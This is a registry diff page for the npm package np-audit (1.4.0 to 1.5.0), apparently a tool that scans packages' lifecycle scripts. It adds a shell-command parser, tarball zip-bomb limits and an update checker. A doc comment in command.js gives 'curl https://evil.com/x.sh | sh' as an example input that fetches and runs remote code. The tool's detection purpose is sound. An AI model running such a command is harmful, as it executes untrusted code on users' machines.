npm - np-audit - Versions diffs - 1.4.0 → 1.5.0 - Mend

np-audit 1.4.0 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

package/README.md +82 -54
package/package.json +1 -1
package/src/cli.js +15 -0
package/src/core/detector.js +181 -37
package/src/core/requireWalker.js +192 -0
package/src/core/scanner.js +306 -48
package/src/utils/command.js +256 -0
package/src/utils/config.js +31 -2
package/src/utils/tarball.js +7 -1
package/src/utils/updateChecker.js +72 -0

package/src/utils/command.js ADDED Viewed

@@ -0,0 +1,256 @@
+'use strict';
+/**
+ * Parse a lifecycle command string into a list of "script references".
+ *
+ * A script reference is either:
+ *   { kind: 'file',  path: 'install.js',  interpreter: 'node' }   — analyze this file
+ *   { kind: 'inline', code: '...',         interpreter: 'sh' }    — analyze this command string
+ *
+ * The parser splits on the standard shell separators `&&`, `||`, `;`, and `|`
+ * (which all chain or redirect commands during npm install), then classifies
+ * each segment. This means commands like:
+ *
+ *   "node pre.js && node post.js"
+ *   "sh ./install.sh; node cleanup.js"
+ *   "curl https://evil.com/x.sh | sh"
+ *
+ * all produce multiple references — earlier versions of np-audit only ever
+ * extracted the first `node` invocation and ignored the rest.
+ *
+ * String literals (quoted) are kept intact so we don't split inside an
+ * `-e "a && b"` argument or similar.
+ */
+function parseCommand(command) {
+  if (!command || typeof command !== 'string') return [];
+  const segments = splitOnShellSeparators(command.trim());
+  const refs = [];
+  for (const segment of segments) {
+    if (!segment) continue;
+    refs.push(...classifySegment(segment));
+  }
+  return refs;
+}
+/**
+ * Split on &&, ||, ;, | — respecting single, double, and backtick quotes.
+ */
+function splitOnShellSeparators(cmd) {
+  const out = [];
+  let buf = '';
+  let quote = null; // null | "'" | '"' | '`'
+  for (let i = 0; i < cmd.length; i++) {
+    const c = cmd[i];
+    if (quote) {
+      if (c === '\\' && i + 1 < cmd.length) {
+        buf += c + cmd[i + 1];
+        i++;
+        continue;
+      }
+      if (c === quote) quote = null;
+      buf += c;
+      continue;
+    }
+    if (c === '"' || c === "'" || c === '`') {
+      quote = c;
+      buf += c;
+      continue;
+    }
+    // && and ||
+    if ((c === '&' || c === '|') && cmd[i + 1] === c) {
+      out.push(buf);
+      buf = '';
+      i++;
+      continue;
+    }
+    // single | (pipe) and ; — also segment boundaries for our purposes:
+    // a pipe `foo | sh` clearly has two commands; a sequence `a ; b` too.
+    if (c === '|' || c === ';') {
+      out.push(buf);
+      buf = '';
+      continue;
+    }
+    buf += c;
+  }
+  out.push(buf);
+  return out.map(s => s.trim()).filter(Boolean);
+}
+/**
+ * Classify a single shell segment into one or more script references.
+ */
+function classifySegment(segment) {
+  const tokens = tokenize(segment);
+  if (tokens.length === 0) return [];
+  const cmd = tokens[0];
+  // Resolve common path-prefix wrappers
+  // e.g. "./node_modules/.bin/foo" → "foo"
+  const cmdBase = cmd.split('/').pop();
+  // Node interpreters
+  if (cmdBase === 'node' || cmdBase === 'nodejs') {
+    return classifyNodeInvocation(tokens.slice(1), segment);
+  }
+  // Other JS runtimes
+  if (cmdBase === 'tsx' || cmdBase === 'ts-node' || cmdBase === 'bun' || cmdBase === 'deno') {
+    const fileArg = tokens.slice(1).find(t => !t.startsWith('-'));
+    if (fileArg) {
+      return [{ kind: 'file', path: stripDotSlash(fileArg), interpreter: cmdBase }];
+    }
+    return [{ kind: 'inline', code: segment, interpreter: cmdBase }];
+  }
+  // Shell-script interpreters
+  if (cmdBase === 'sh' || cmdBase === 'bash' || cmdBase === 'zsh' || cmdBase === 'dash') {
+    return classifyShellInvocation(tokens.slice(1), segment);
+  }
+  // Python and friends
+  if (cmdBase === 'python' || cmdBase === 'python2' || cmdBase === 'python3'
+      || cmdBase === 'ruby' || cmdBase === 'perl' || cmdBase === 'php') {
+    const args = tokens.slice(1);
+    for (let i = 0; i < args.length; i++) {
+      const a = args[i];
+      // -c "code", -e "code" — execute the next argument as code
+      if (a === '-c' || a === '-e') {
+        return [{ kind: 'inline', code: args[i + 1] || '', interpreter: cmdBase }];
+      }
+      if (a.startsWith('-')) continue;
+      return [{ kind: 'file', path: stripDotSlash(a), interpreter: cmdBase }];
+    }
+    return [{ kind: 'inline', code: segment, interpreter: cmdBase }];
+  }
+  // `.js`/`.mjs`/`.cjs` files invoked directly (shebang)
+  if (/\.(?:js|mjs|cjs|sh|bash|py|rb|pl)$/.test(cmdBase)) {
+    return [{ kind: 'file', path: stripDotSlash(cmd), interpreter: 'auto' }];
+  }
+  // npx — running an arbitrary package. We can't statically know which file
+  // it executes, but the command string itself is worth surfacing.
+  if (cmdBase === 'npx') {
+    return [{ kind: 'inline', code: segment, interpreter: 'shell', npx: true }];
+  }
+  // Anything else (curl, wget, cd, env, …): keep as inline so it shows up in
+  // the report and is run through the obfuscation checks at least as a string.
+  return [{ kind: 'inline', code: segment, interpreter: 'shell' }];
+}
+/**
+ * Handle `node <args...>`. Cases:
+ *   node script.js              → file
+ *   node -e "..."               → inline (the code IS the argument)
+ *   node -p "..."               → inline
+ *   node --eval "..."           → inline
+ *   node --experimental-foo s.js → file (skip flags, pick first non-flag)
+ */
+function classifyNodeInvocation(args, fullSegment) {
+  for (let i = 0; i < args.length; i++) {
+    const a = args[i];
+    if (a === '-e' || a === '--eval' || a === '-p' || a === '--print') {
+      const code = args[i + 1] || '';
+      return [{ kind: 'inline', code: stripQuotes(code), interpreter: 'node' }];
+    }
+    if (a.startsWith('-')) continue;
+    // First non-flag token is the script file
+    return [{ kind: 'file', path: stripDotSlash(a), interpreter: 'node' }];
+  }
+  // No file, no -e — fall through to inline
+  return [{ kind: 'inline', code: fullSegment, interpreter: 'node' }];
+}
+/**
+ * Handle `sh <args...>`. Cases:
+ *   sh script.sh                → file (the .sh file is fetched & scanned)
+ *   sh -c "..."                 → inline (the code IS the argument)
+ *   bash -c "..."               → inline
+ */
+function classifyShellInvocation(args, fullSegment) {
+  for (let i = 0; i < args.length; i++) {
+    const a = args[i];
+    if (a === '-c') {
+      const code = args[i + 1] || '';
+      return [{ kind: 'inline', code: stripQuotes(code), interpreter: 'sh' }];
+    }
+    if (a.startsWith('-')) continue;
+    return [{ kind: 'file', path: stripDotSlash(a), interpreter: 'sh' }];
+  }
+  return [{ kind: 'inline', code: fullSegment, interpreter: 'sh' }];
+}
+/**
+ * Lightweight shell-style tokenizer — respects single, double, backtick quotes
+ * and \-escapes. Does NOT do variable expansion (we want the literal command
+ * the way npm would hand it to /bin/sh).
+ */
+function tokenize(s) {
+  const out = [];
+  let buf = '';
+  let quote = null;
+  for (let i = 0; i < s.length; i++) {
+    const c = s[i];
+    if (quote) {
+      if (c === '\\' && i + 1 < s.length && quote === '"') {
+        buf += s[i + 1];
+        i++;
+        continue;
+      }
+      if (c === quote) { quote = null; continue; }
+      buf += c;
+      continue;
+    }
+    if (c === '"' || c === "'" || c === '`') {
+      quote = c;
+      continue;
+    }
+    if (c === '\\' && i + 1 < s.length) {
+      buf += s[i + 1];
+      i++;
+      continue;
+    }
+    if (/\s/.test(c)) {
+      if (buf) { out.push(buf); buf = ''; }
+      continue;
+    }
+    buf += c;
+  }
+  if (buf) out.push(buf);
+  return out;
+}
+function stripDotSlash(p) {
+  return p.replace(/^\.\//, '');
+}
+function stripQuotes(s) {
+  if (s.length >= 2) {
+    const f = s[0], l = s[s.length - 1];
+    if ((f === '"' || f === "'" || f === '`') && f === l) {
+      return s.slice(1, -1);
+    }
+  }
+  return s;
+}
+module.exports = { parseCommand, splitOnShellSeparators, tokenize };

package/src/utils/config.js CHANGED Viewed

@@ -15,6 +15,8 @@ const DEFAULT_CONFIG = Object.freeze({
   skipScopes:      [],
   skipPackages:    [],
   silent:          false,
+  scanSelf:        true,
+  maxTarballSize:  '50MB', // Max unpacked tarball size (e.g. '5MB', '1GB', or bytes as number)
 });
 const VALID_KEYS = new Set(Object.keys(DEFAULT_CONFIG));
@@ -29,17 +31,44 @@ function readJSON(filePath) {
 function loadConfig(cwd) {
   const base    = { ...DEFAULT_CONFIG };
+  // Parse the default maxTarballSize string to bytes
+  base.maxTarballSize = parseSize(base.maxTarballSize);
   const global_ = readJSON(GLOBAL_CONFIG_PATH) || {};
   const local   = cwd ? readJSON(path.join(cwd, '.npmauditor.json')) || {} : {};
   return Object.assign(base, coerce(global_), coerce(local));
 }
+/**
+ * Parse size strings like '5MB', '1GB', '500KB' to bytes.
+ * @param {string|number} value
+ * @returns {number} Size in bytes
+ */
+function parseSize(value) {
+  if (typeof value === 'number') return Math.max(0, value);
+  if (typeof value !== 'string') return 0;
+  const match = value.trim().match(/^(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)?$/i);
+  if (!match) return 0;
+  const num = parseFloat(match[1]);
+  const unit = (match[2] || 'B').toUpperCase();
+  const multipliers = { B: 1, KB: 1024, MB: 1024 ** 2, GB: 1024 ** 3 };
+  const bytes = num * (multipliers[unit] || 1);
+  // Cap at available RAM to prevent out-of-memory
+  const totalMem = os.totalmem();
+  return Math.min(Math.max(0, Math.floor(bytes)), totalMem);
+}
 function coerce(obj) {
   const result = {};
   for (const [key, val] of Object.entries(obj)) {
     if (!VALID_KEYS.has(key)) continue;
     const def = DEFAULT_CONFIG[key];
-    if (Array.isArray(def)) {
+    if (key === 'maxTarballSize') {
+      result[key] = parseSize(val);
+    } else if (Array.isArray(def)) {
       result[key] = Array.isArray(val) ? val : [val];
     } else if (typeof def === 'number') {
       const n = Number(val);
@@ -71,4 +100,4 @@ function getGlobalConfigPath() {
   return GLOBAL_CONFIG_PATH;
 }
-module.exports = { loadConfig, setGlobalConfig, getGlobalConfigPath, DEFAULT_CONFIG, VALID_KEYS };
+module.exports = { loadConfig, setGlobalConfig, getGlobalConfigPath, DEFAULT_CONFIG, VALID_KEYS, parseSize };

package/src/utils/tarball.js CHANGED Viewed

@@ -9,11 +9,13 @@ const BLOCK_SIZE = 512;
  * Pure Node.js — no external dependencies.
  * Handles GNU long name (typeflag 'L') and POSIX ustar extended headers (typeflag 'x').
  * @param {Buffer} gzipBuffer
+ * @param {number} [maxSize] Maximum total unpacked size in bytes
  * @returns {Map<string, Buffer>}
  */
-function parseTarGz(gzipBuffer) {
+function parseTarGz(gzipBuffer, maxSize = null) {
   const tar = zlib.gunzipSync(gzipBuffer);
   const files = new Map();
+  let totalUnpackedSize = 0;
   let offset = 0;
   let pendingLongName = null;
@@ -56,6 +58,10 @@ function parseTarGz(gzipBuffer) {
     name = name.replace(/\0/g, '');
     if ((typeFlag === '0' || typeFlag === '\0') && size > 0) {
+      totalUnpackedSize += size;
+      if (maxSize !== null && maxSize !== undefined && totalUnpackedSize > maxSize) {
+        throw new Error(`Tarball unpacked size (${totalUnpackedSize} bytes) exceeds limit (${maxSize} bytes) — potential zip bomb`);
+      }
       files.set(name, tar.slice(offset, offset + size));
     }

package/src/utils/updateChecker.js ADDED Viewed

@@ -0,0 +1,72 @@
+'use strict';
+const fs   = require('fs');
+const path = require('path');
+const os   = require('os');
+const CACHE_FILE = path.join(os.homedir(), '.npa-update-check');
+const CHECK_INTERVAL = 172800000; // 2 days in ms
+/**
+ * Check for a newer version of np-audit on the registry.
+ * Non-blocking — swallows all errors and returns null on failure.
+ * @param {object} config  Must have `registry` and `timeout` keys.
+ * @param {string} currentVersion  The currently installed version.
+ * @returns {Promise<string|null>} The latest version if newer, or null.
+ */
+async function checkForUpdate(config, currentVersion) {
+  try {
+    const cache = readCache();
+    const now = Date.now();
+    if (cache && (now - cache.lastCheck) < CHECK_INTERVAL) {
+      return isNewer(cache.latestVersion, currentVersion) ? cache.latestVersion : null;
+    }
+    const { fetchJSON } = require('./fetcher');
+    const meta = await fetchJSON(`${config.registry}/np-audit`, { timeout: 5000 });
+    const latest = meta['dist-tags'] && meta['dist-tags'].latest;
+    if (latest) {
+      writeCache({ lastCheck: now, latestVersion: latest });
+      return isNewer(latest, currentVersion) ? latest : null;
+    }
+    return null;
+  } catch {
+    return null;
+  }
+}
+/**
+ * Compare two semver strings. Returns true if `a` is newer than `b`.
+ */
+function isNewer(a, b) {
+  const pa = a.split(/[-.]/).map(s => parseInt(s, 10) || 0);
+  const pb = b.split(/[-.]/).map(s => parseInt(s, 10) || 0);
+  for (let i = 0; i < 3; i++) {
+    if ((pa[i] || 0) > (pb[i] || 0)) return true;
+    if ((pa[i] || 0) < (pb[i] || 0)) return false;
+  }
+  // Same x.y.z — pre-release (e.g. "beta") is older than stable
+  if (b.includes('-') && !a.includes('-')) return true;
+  return false;
+}
+function readCache() {
+  try {
+    return JSON.parse(fs.readFileSync(CACHE_FILE, 'utf8'));
+  } catch {
+    return null;
+  }
+}
+function writeCache(data) {
+  try {
+    fs.writeFileSync(CACHE_FILE, JSON.stringify(data), 'utf8');
+  } catch {
+    // Non-critical — ignore write failures
+  }
+}
+module.exports = { checkForUpdate, isNewer, CHECK_INTERVAL, CACHE_FILE };